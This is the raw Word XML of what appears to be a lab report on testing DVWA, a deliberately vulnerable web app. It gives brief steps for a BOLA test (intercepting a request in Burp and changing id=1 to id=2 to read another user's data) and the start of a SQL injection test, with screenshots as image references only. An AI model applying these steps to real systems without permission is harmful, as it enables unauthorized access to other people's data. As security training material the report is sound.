      <w:r w:rsidRPr="008612E2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251679744" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2C3335C7" wp14:editId="2BCB5931">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>73191</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4775587" cy="1718321"/>
            <wp:effectExtent l="19050" t="19050" r="25400" b="15240"/>
            <wp:wrapNone/>
            <wp:docPr id="2103270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270303" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4775587" cy="1718321"/>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115FB386" w14:textId="05E8FFD9" w:rsidR="00657DED" w:rsidRPr="00557598" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="1F76D12E" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00557598" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="2C439FB6" w14:textId="5F38FE60" w:rsidR="00657DED" w:rsidRPr="00557598" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="3952E654" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00557598" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="3C5AFCDB" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="09A33D52" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="56742B82" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="41B60753" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="567BE8A9" w14:textId="77777777" w:rsidR="0049249D" w:rsidRDefault="0049249D" w:rsidP="00657DED"/>
    <w:p w14:paraId="39A37016" w14:textId="77777777" w:rsidR="0049249D" w:rsidRDefault="0049249D" w:rsidP="00657DED"/>
    <w:p w14:paraId="4E6BD67E" w14:textId="77777777" w:rsidR="0049249D" w:rsidRDefault="0049249D" w:rsidP="00657DED"/>
    <w:p w14:paraId="06C29A71" w14:textId="77777777" w:rsidR="0049249D" w:rsidRDefault="0049249D" w:rsidP="00657DED"/>
    <w:p w14:paraId="3B53F1E1" w14:textId="77777777" w:rsidR="0049249D" w:rsidRDefault="0049249D" w:rsidP="00657DED"/>
    <w:p w14:paraId="7F43C09B" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="6541091F" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="0B07CC32" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A21AB1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Test for BOLA (Broken Object Level Authorization)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45315D26" w14:textId="5CD4A11A" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Capture request in Burp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CF637C" w14:textId="64354DD1" w:rsidR="00657DED" w:rsidRDefault="00A43ABC" w:rsidP="00657DED">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251680768" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="58CCACEC" wp14:editId="1CAED23B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>13252</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5334000" cy="1933575"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:wrapNone/>
            <wp:docPr id="2035879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879265" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="1933575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C283601" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00E34641" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="0DACB9C8" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00E34641" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="365FD2F9" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00E34641" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="152D5F78" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00E34641" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="08B43D3D" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00E34641" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="059DFAF2" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00E34641" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="18B0C8B8" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="19656010" w14:textId="77777777" w:rsidR="00A43ABC" w:rsidRDefault="00A43ABC" w:rsidP="00657DED"/>
    <w:p w14:paraId="193D7577" w14:textId="77777777" w:rsidR="00A43ABC" w:rsidRDefault="00A43ABC" w:rsidP="00657DED"/>
    <w:p w14:paraId="5FF01B95" w14:textId="77777777" w:rsidR="00A43ABC" w:rsidRDefault="00A43ABC" w:rsidP="00657DED"/>
    <w:p w14:paraId="5110F42A" w14:textId="2531D2E8" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00D10156">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251681792" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="500EEB91" wp14:editId="3A98F623">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3148</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>291217</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5260616" cy="2033297"/>
            <wp:effectExtent l="19050" t="19050" r="16510" b="24130"/>
            <wp:wrapNone/>
            <wp:docPr id="807525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525625" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5260616" cy="2033297"/>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t>Modify the request from id=1 to id=2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1273C760" w14:textId="536357F2" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="7EB478BA" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00D10156" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="6C886304" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00D10156" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="474B7C93" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00D10156" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="35F6F170" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="17A8F208" w14:textId="77777777" w:rsidR="00055C7B" w:rsidRDefault="00055C7B" w:rsidP="00657DED"/>
    <w:p w14:paraId="5CE6A266" w14:textId="77777777" w:rsidR="00055C7B" w:rsidRDefault="00055C7B" w:rsidP="00657DED"/>
    <w:p w14:paraId="39C8E4D5" w14:textId="77777777" w:rsidR="00055C7B" w:rsidRDefault="00055C7B" w:rsidP="00657DED"/>
    <w:p w14:paraId="6B15E5F8" w14:textId="77777777" w:rsidR="00055C7B" w:rsidRPr="00D10156" w:rsidRDefault="00055C7B" w:rsidP="00657DED"/>
    <w:p w14:paraId="5D992DF4" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00D10156" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="5884C26E" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="7823D92A" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="124F0CFB" w14:textId="3925CD16" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="008B5138">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251682816" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4F05C7CB" wp14:editId="63C03D72">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>464654</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4673904" cy="2282024"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:wrapNone/>
            <wp:docPr id="1284148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148740" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4673904" cy="2282024"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Forward the request and when you visit DVWA website you will see </w:t>
      </w:r>
      <w:r w:rsidRPr="004255B5">
        <w:t>the API returns another user's data</w:t>
      </w:r>
      <w:r>
        <w:t>. This suggests BOLA exists.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB1C23C" w14:textId="48D1F160" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="27757BD3" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00564EB0" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="611C0339" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00564EB0" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="0AB49D0B" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00564EB0" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="4DF961B9" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00564EB0" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="7326CEEB" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="0070BF1A" w14:textId="77777777" w:rsidR="00FC6332" w:rsidRDefault="00FC6332" w:rsidP="00657DED"/>
    <w:p w14:paraId="7A428195" w14:textId="77777777" w:rsidR="00FC6332" w:rsidRDefault="00FC6332" w:rsidP="00657DED"/>
    <w:p w14:paraId="09057817" w14:textId="77777777" w:rsidR="00FC6332" w:rsidRDefault="00FC6332" w:rsidP="00657DED"/>
    <w:p w14:paraId="7E626F6A" w14:textId="77777777" w:rsidR="00FC6332" w:rsidRDefault="00FC6332" w:rsidP="00657DED"/>
    <w:p w14:paraId="77852C3E" w14:textId="77777777" w:rsidR="00FC6332" w:rsidRDefault="00FC6332" w:rsidP="00657DED"/>
    <w:p w14:paraId="3BCDDBF9" w14:textId="77777777" w:rsidR="00FC6332" w:rsidRDefault="00FC6332" w:rsidP="00657DED"/>
    <w:p w14:paraId="43648434" w14:textId="77777777" w:rsidR="00FC6332" w:rsidRDefault="00FC6332" w:rsidP="00657DED"/>
    <w:p w14:paraId="1D06F39E" w14:textId="77777777" w:rsidR="00FC6332" w:rsidRDefault="00FC6332" w:rsidP="00657DED"/>
    <w:p w14:paraId="32DD0FF9" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="8189"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65BA8E02" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="8189"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40E6D8AA" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="8189"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F5F2E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Automated SQL Injection Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7312C7D9" w14:textId="5A0821B5" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="8189"/>
        </w:tabs>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Launch DVWA website SQL Injection section.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3289C4B9" w14:textId="05021192" w:rsidR="00657DED" w:rsidRDefault="00FC6332" w:rsidP="00657DED">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="8189"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00E925B6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251683840" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="30A4441C" wp14:editId="0E27FA93">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>12589</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4086414" cy="3029447"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1914445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445451" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4086414" cy="3029447"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4CAE78" w14:textId="1FC9807D" w:rsidR="00657DED" w:rsidRPr="00E925B6" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="1ACE1374" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00E925B6" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="6ECD0528" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00E925B6" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="4A4BBC54" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00E925B6" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="5684B277" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00E925B6" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="3BBF51CD" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00E925B6" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="35B205C2" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="46C1D560" w14:textId="77777777" w:rsidR="00012D62" w:rsidRDefault="00012D62" w:rsidP="00657DED"/>
    <w:p w14:paraId="107D9D24" w14:textId="77777777" w:rsidR="00012D62" w:rsidRDefault="00012D62" w:rsidP="00657DED"/>
    <w:p w14:paraId="743E05B4" w14:textId="77777777" w:rsidR="00012D62" w:rsidRDefault="00012D62" w:rsidP="00657DED"/>
    <w:p w14:paraId="2CA0ED67" w14:textId="77777777" w:rsidR="00012D62" w:rsidRDefault="00012D62" w:rsidP="00657DED"/>
    <w:p w14:paraId="53E52B61" w14:textId="77777777" w:rsidR="00012D62" w:rsidRDefault="00012D62" w:rsidP="00657DED"/>
    <w:p w14:paraId="2BEF0D95" w14:textId="77777777" w:rsidR="00012D62" w:rsidRDefault="00012D62" w:rsidP="00657DED"/>
    <w:p w14:paraId="5BAA0404" w14:textId="77777777" w:rsidR="00012D62" w:rsidRPr="00E925B6" w:rsidRDefault="00012D62" w:rsidP="00657DED"/>
    <w:p w14:paraId="0993A69E" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00E925B6" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="006BA54A" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00E925B6" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="3CB0A99A" w14:textId="729C977E" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="606748BE" w14:textId="7C6CB33B" w:rsidR="00657DED" w:rsidRDefault="00012D62" w:rsidP="00657DED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC4DF7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251684864" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2B3F843F" wp14:editId="731C8E83">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>286689</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5443496" cy="2813636"/>
            <wp:effectExtent l="19050" t="19050" r="24130" b="25400"/>
            <wp:wrapNone/>
            <wp:docPr id="570259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259713" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5443496" cy="2813636"/>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657DED">
        <w:t>Open BurpSuite and turn intercept on.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755E977B" w14:textId="1C6E2314" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="48E6508E" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00CC4DF7" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="46AD2FA0" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00CC4DF7" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="7D08F75F" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00CC4DF7" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="5C06E714" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00CC4DF7" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="0FDBD5F1" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00CC4DF7" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="7FAB32B3" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00CC4DF7" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="65C4E70D" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00CC4DF7" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="4DE0B876" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00CC4DF7" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="41115F6F" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="7B343B70" w14:textId="77777777" w:rsidR="00012D62" w:rsidRDefault="00012D62" w:rsidP="00657DED"/>
    <w:p w14:paraId="5286F3A0" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="1E3D13D9" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="282F33B1" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="35DEC832" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="3EB2F729" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="0A6283F1" w14:textId="77777777" w:rsidR="009E3389" w:rsidRDefault="009E3389" w:rsidP="00657DED"/>
    <w:p w14:paraId="59E565F4" w14:textId="77777777" w:rsidR="009E3389" w:rsidRDefault="009E3389" w:rsidP="00657DED"/>
    <w:p w14:paraId="21EE679C" w14:textId="77777777" w:rsidR="009E3389" w:rsidRDefault="009E3389" w:rsidP="00657DED"/>
    <w:p w14:paraId="52C13692" w14:textId="77777777" w:rsidR="009E3389" w:rsidRDefault="009E3389" w:rsidP="00657DED"/>
    <w:p w14:paraId="05AEF049" w14:textId="77777777" w:rsidR="009E3389" w:rsidRDefault="009E3389" w:rsidP="00657DED"/>
    <w:p w14:paraId="247CB8AE" w14:textId="77777777" w:rsidR="009E3389" w:rsidRDefault="009E3389" w:rsidP="00657DED"/>
    <w:p w14:paraId="3C7C6B11" w14:textId="77777777" w:rsidR="009E3389" w:rsidRDefault="009E3389" w:rsidP="00657DED"/>
    <w:p w14:paraId="72C0C74B" w14:textId="6C63963C" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Enter User ID as 1 and capture the request by clicking submit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AA7B8F" w14:textId="43876885" w:rsidR="00657DED" w:rsidRDefault="00C46746" w:rsidP="00657DED">
      <w:r w:rsidRPr="008D6756">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251686912" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="14069479" wp14:editId="4C15CF07">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>13970</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5327015" cy="2526030"/>
            <wp:effectExtent l="0" t="0" r="6985" b="7620"/>
            <wp:wrapNone/>
            <wp:docPr id="1896794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794230" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
